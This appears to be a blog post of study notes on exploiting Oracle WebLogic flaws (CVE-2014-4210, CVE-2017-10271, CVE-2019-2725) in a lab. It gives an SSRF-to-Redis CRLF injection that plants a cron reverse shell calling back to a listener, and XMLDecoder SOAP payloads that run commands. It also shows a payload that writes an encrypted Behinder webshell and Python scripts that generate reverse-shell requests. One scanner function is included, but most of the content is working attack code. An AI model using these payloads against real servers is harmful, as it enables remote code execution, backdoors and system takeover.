1. SSRF vulnerability (CVE-2014-4210)

  • Affected versions: WebLogic 10.0.2 -- 10.3.6.0
  • Vulnerable location: 127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp
  • Exploitation:
    [screenshot: the SearchPublicRegistries search form]
    Type anything into the form, click Search and capture the request.
    [screenshot: captured request]
    The parameter in the red box (operator) is where the SSRF lies: the server fetches whatever URL is supplied there and reports on the result.

For example, the response when it is changed to 127.0.0.1:7001 (a listening port):

    [screenshot: response for port 7001, an error saying the reply did not have a valid SOAP content-type]
And the response when it is changed to a port that is not open, e.g. 8888:
    [screenshot: response for port 8888, an error saying it could not connect over HTTP to the server]
Because the two error messages differ, the response tells open ports from closed ones, which is enough to scan the internal network from the WebLogic host.

  • Exploitation 2:
    Inject CRLF line breaks with %0D%0A and abuse an internal Redis to get a reverse shell.
    The lines below are what Redis should receive. The "xxx" filler on either end absorbs the "GET /" prefix and the " HTTP/1.1" suffix that WebLogic wraps around the path; Redis rejects those lines as unknown commands and executes the ones in between:
xxx
set asd "\n\n* * * * *  sh -i >& /dev/tcp/192.168.111.128/4444 0>&1\n\n "
config set dir /var/spool/cron
config set dbfilename root
save
xxx

URL-encode the commands above. The \n escapes inside the quoted value are expanded by Redis when it parses the inline command; they put blank lines between the cron entry and the binary RDB header and trailer that save writes around it. This needs an unauthenticated Redis reachable from the WebLogic host with CONFIG not renamed or disabled, and a cron daemon that skips lines it cannot parse (the cron shipped with CentOS does; Debian/Ubuntu's cron rejects the file).

poc:

http://192.168.111.131:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/xxx%0D%0Aset%20asd%20%22%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.111.128%2F4444%200%3E%261%5Cn%5Cn%20%22%0D%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%0D%0Aconfig%20set%20dbfilename%20root%0D%0Asave%0D%0Axxx

Check on the Redis server:

Good, the cron job has been written.

A short while later the shell comes back as well.
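The request construction and the port-probe classification from this section, as an added example that is not code from the original post. It builds the SearchPublicRegistries URL whose operator parameter smuggles Redis commands through CRLF injection, and classifies the uddiexplorer error messages into open / closed ports. The WebLogic, Redis and listener addresses are the post's lab values and are placeholders; the two sample response bodies are constructed here from the shape of the error messages the page returns, so confirm the marker strings against your own target before relying on them.

```python
"""Added example for the CVE-2014-4210 section (not from the original post):
build the CRLF-injecting SSRF request and classify port-probe responses."""
from urllib.parse import parse_qs, quote, urlparse

UDDI_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"
# The other form fields are fixed; only `operator` is used as a URL by the server.
BASE_QUERY = ("rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor="
              "&selfor=Business+location&btnSubmit=Search")

# Error-message fragments from the uddiexplorer response (assumed from the lab
# output; verify on your target): a reachable port answers with a non-SOAP body,
# an unreachable one with a connect failure.
OPEN_MARKER = "which did not have a valid SOAP content-type"
CLOSED_MARKER = "could not connect over HTTP to server"


def classify_probe(body):
    """Map the SSRF response body to 'open' / 'closed' / 'unknown' for the probed port."""
    if OPEN_MARKER in body:
        return "open"
    if CLOSED_MARKER in body:
        return "closed"
    return "unknown"


def redis_cron_commands(lhost, lport, key="asd"):
    """Inline Redis commands that dump a crontab with a reverse shell to /var/spool/cron/root.

    The \\n escapes stay literal here; Redis's inline-command parser expands them
    inside the quoted value, which is what separates the cron entry from the
    binary RDB header and trailer.
    """
    cron = f"* * * * *  sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    return [
        f'set {key} "\\n\\n{cron}\\n\\n "',
        "config set dir /var/spool/cron",
        "config set dbfilename root",
        "save",
    ]


def build_ssrf_url(weblogic, redis_host, redis_port, commands, pad="xxx"):
    """Build the GET URL. The `pad` lines absorb the 'GET /' prefix and the
    ' HTTP/1.1' suffix WebLogic adds around the path; Redis ignores them as
    unknown commands and executes the lines in between."""
    inline = pad + "\r\n" + "\r\n".join(commands) + "\r\n" + pad
    # safe="" also encodes '/', '*', '"', '>' and '&', exactly as in the post's poc.
    operator = f"http://{redis_host}:{redis_port}/" + quote(inline, safe="")
    return f"http://{weblogic}{UDDI_PATH}?{BASE_QUERY}&operator={operator}"


def smuggled_lines(url):
    """Decode the operator parameter and split it the way Redis will: one command per CRLF."""
    operator = parse_qs(urlparse(url).query)["operator"][0]
    path = operator.split("/", 3)[3]  # everything after http://host:port/
    return path.split("\r\n")


# Constructed sample responses (the shape of the two messages, for the classifier).
SAMPLE_OPEN = ("An error has occurred<BR>weblogic.uddi.client.structures.exception."
               "XML_SoapException: Received a response from url: http://127.0.0.1:7001 "
               "which did not have a valid SOAP content-type: text/html.")
SAMPLE_CLOSED = ("An error has occurred<BR>weblogic.uddi.client.structures.exception."
                 "XML_SoapException: Tried all: '1' addresses, but could not connect "
                 "over HTTP to server: '127.0.0.1', port: '8888'")

if __name__ == "__main__":
    print(classify_probe(SAMPLE_OPEN), classify_probe(SAMPLE_CLOSED))
    url = build_ssrf_url("192.168.111.131:7001", "172.20.0.2", 6379,
                         redis_cron_commands("192.168.111.128", 4444))
    print(url)
    for line in smuggled_lines(url):
        print(repr(line))
```

smuggled_lines is the check worth running before firing the request: it shows the exact lines Redis will parse, so a stray space or an unencoded character is caught in the decoded view rather than by a silent Redis error.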


2. Command execution without output (CVE-2017-3506 & CVE-2017-10271)

  • Affected versions: WebLogic 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0
  • Vulnerable location: 127.0.0.1:7001/wls-wsat/CoordinatorPortType (POST)
  • Exploitation:
    The wls-wsat component hands the WorkContext SOAP header to java.beans.XMLDecoder, which instantiates whatever classes the XML describes, so a java.lang.ProcessBuilder can be built and started straight from the request body.
    Capture the request, change the method to POST and set Content-Type to text/xml.
    POST body:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0"><string>cmd.exe</string></void>
              <void index="1"><string>/c</string></void>
              <void index="2"><string>calc</string></void>
              <!--
              <void index="0"><string>/bin/sh</string></void>
              <void index="1"><string>-c</string></void>
              <void index="2"><string>touch /tmp/shell</string></void>
              -->
            </array>
          <void method="start"/></void>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

The response is HTTP 500, but the command has actually run. Nothing is echoed back, so confirm execution by its side effect (the calc window, or the existence of /tmp/shell with the commented-out Linux variant).

  • Exploitation (writing a webshell):
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter">
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/shell.jsp</string>
    <void method="println"><string>
    <![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="xxxxxxxxxxxxxxxx";/*the key is the first 16 characters of the 32-character MD5 of the connection password; the default password is rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

The PrintWriter path is relative to the domain directory, and the 9j4dqk directory under bea_wls_internal may differ between installations, so check the target's own path. The file is written into the bea_wls_internal web application, which is why it is then served at /bea_wls_internal/shell.jsp.

Then connect with Behinder (冰蝎) to http://192.168.111.131:7001/bea_wls_internal/shell.jsp to test.


3. Deserialization remote code execution (CVE-2019-2725)

  • Affected versions: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3
  • Vulnerable location: 127.0.0.1:7001/_async/AsyncResponseService (POST)
    (exploited much like the previous one: the WorkContext header is again fed to XMLDecoder, this time via the _async component; note that this poc places the ProcessBuilder directly inside WorkContext without the <java class="java.beans.XMLDecoder"> wrapper used above)
  • Exploitation:
    poc
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">  
  <soapenv:Header> 
    <wsa:Action>xx</wsa:Action>  
    <wsa:RelatesTo>xx</wsa:RelatesTo>  
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
      <void class="java.lang.ProcessBuilder"> 
        <array class="java.lang.String" length="3"> 
          <void index="0"> <string>cmd.exe</string></void>  
          <void index="1">  <string>/c</string></void>  
          <void index="2"> <string>calc</string></void> 
          <!--
          <void index="0"><string>/bin/sh</string></void>
          <void index="1"><string>-c</string></void>
          <void index="2"><string>touch /tmp/shell</string></void>
          -->
        </array>  
        <void method="start"/>
      </void> 
    </work:WorkContext> 
  </soapenv:Header>  
  <soapenv:Body> 
    <asy:onAsyncDelivery/> 
  </soapenv:Body>
</soapenv:Envelope>

The response is HTTP 202; as before, the command runs without any output in the response.

Or get a shell directly with Metasploit:
exploit(multi/misc/weblogic_deserialize_asyncresponseservice)
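The two XMLDecoder payloads from sections 2 and 3 share one structure, so here is a single added example (not code from the original post) that serves both. build_envelope generates the WorkContext ProcessBuilder payload for either endpoint with the command arguments XML-escaped, which matters as soon as you move from calc to a reverse shell: `sh -i >& /dev/tcp/...` contains '>' and '&', which break the raw XML in the pocs above if pasted in unescaped. inspect_envelope is the detection side: it flags a WorkContext header that carries XMLDecoder-style object construction regardless of which element name the payload uses. The endpoint labels, the helper names and the constructed benign request are this example's own assumptions.

```python
"""Added example covering the CVE-2017-10271 and CVE-2019-2725 sections
(not from the original post): payload builder plus a request inspector."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"
# Classes that have no business inside a WorkContext header (assumed denylist).
DANGEROUS_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime",
                     "java.beans.XMLDecoder", "java.io.PrintWriter"}
# Element names XMLDecoder treats as object construction / method calls.
DECODER_ELEMENTS = {"java", "object", "void", "class", "array"}


def _process_builder(argv, indent):
    """XMLDecoder markup for new ProcessBuilder(argv).start(), arguments escaped."""
    pad = " " * indent
    items = "\n".join(
        f'{pad}    <void index="{i}"><string>{escape(a)}</string></void>'
        for i, a in enumerate(argv))
    return (f'{pad}<void class="java.lang.ProcessBuilder">\n'
            f'{pad}  <array class="java.lang.String" length="{len(argv)}">\n'
            f'{items}\n'
            f'{pad}  </array>\n'
            f'{pad}  <void method="start"/>\n'
            f'{pad}</void>')


def build_envelope(argv, endpoint):
    """endpoint: 'wls-wsat' (CoordinatorPortType, CVE-2017-10271) or
    'async' (AsyncResponseService, CVE-2019-2725). Send as POST, Content-Type: text/xml."""
    if endpoint == "wls-wsat":
        extra_ns = ""
        header = (f'    <work:WorkContext xmlns:work="{WORK_NS}">\n'
                  f'      <java version="1.8.0_131" class="java.beans.XMLDecoder">\n'
                  f'{_process_builder(argv, 8)}\n'
                  f'      </java>\n'
                  f'    </work:WorkContext>')
        body = "  <soapenv:Body/>"
    elif endpoint == "async":
        extra_ns = (' xmlns:wsa="http://www.w3.org/2005/08/addressing"'
                    ' xmlns:asy="http://www.bea.com/async/AsyncResponseService"')
        header = (f'    <wsa:Action>xx</wsa:Action>\n'
                  f'    <wsa:RelatesTo>xx</wsa:RelatesTo>\n'
                  f'    <work:WorkContext xmlns:work="{WORK_NS}">\n'
                  f'{_process_builder(argv, 6)}\n'
                  f'    </work:WorkContext>')
        body = "  <soapenv:Body>\n    <asy:onAsyncDelivery/>\n  </soapenv:Body>"
    else:
        raise ValueError(f"unknown endpoint {endpoint!r}")
    return (f'<?xml version="1.0" encoding="utf-8"?>\n'
            f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"{extra_ns}>\n'
            f'  <soapenv:Header>\n{header}\n  </soapenv:Header>\n'
            f'{body}\n</soapenv:Envelope>')


def extract_argv(envelope):
    """Recover the ProcessBuilder argv from a payload (XML comments, as in the post's poc, are skipped)."""
    root = ET.fromstring(envelope)
    for arr in root.iter("array"):
        if arr.get("class") == "java.lang.String":
            return [v.find("string").text for v in arr.findall("void")]
    return []


def inspect_envelope(envelope):
    """Findings for one request; an empty list means the header carries no XMLDecoder-style content."""
    root = ET.fromstring(envelope)
    findings = []
    header = root.find(f"{{{SOAP_NS}}}Header")
    if header is None:
        return findings
    for ctx in header.iter(f"{{{WORK_NS}}}WorkContext"):
        for el in ctx.iter():
            if el.get("class") in DANGEROUS_CLASSES:
                findings.append(f"class={el.get('class')}")
            elif el.tag in DECODER_ELEMENTS:
                findings.append(f"element=<{el.tag}>")
    return findings


# Constructed benign request for comparison: an empty header, no WorkContext.
BENIGN = (f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Header/>'
          f'<soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>')

if __name__ == "__main__":
    shell = ["/bin/sh", "-c", "sh -i >& /dev/tcp/192.168.111.128/4444 0>&1"]
    payload = build_envelope(shell, "async")
    print(payload)
    print(extract_argv(payload))
    print(inspect_envelope(payload), inspect_envelope(BENIGN))
```

Detecting on the WorkContext header carrying any XMLDecoder construction, rather than on one element name, is deliberate: Oracle's fixes in this family were element-name denylists, and CVE-2019-2725 was exactly a bypass of the CVE-2017-10271 one, so a monitor keyed to a single tag inherits the same weakness.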


4. Arbitrary file upload (CVE-2019-2618)

  • Affected versions: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3
  • Vulnerable location: 127.0.0.1:7001/bea_wls_deployment_internal/DeploymentService (POST)
  • Prerequisite: a valid username and password are required (which makes it of limited use)
  • Exploitation:
    (to be added)
Author:     Title: weblogic漏洞学习积累 (WebLogic vulnerability study notes)
URL: https://yuaneuro.cn/archives/weblogic.html
Copyright: unless otherwise noted, this article is original content of "yuaneuro的小站"; keep the source link when reposting.
Last modification: April 5th, 2021 at 02:25 pm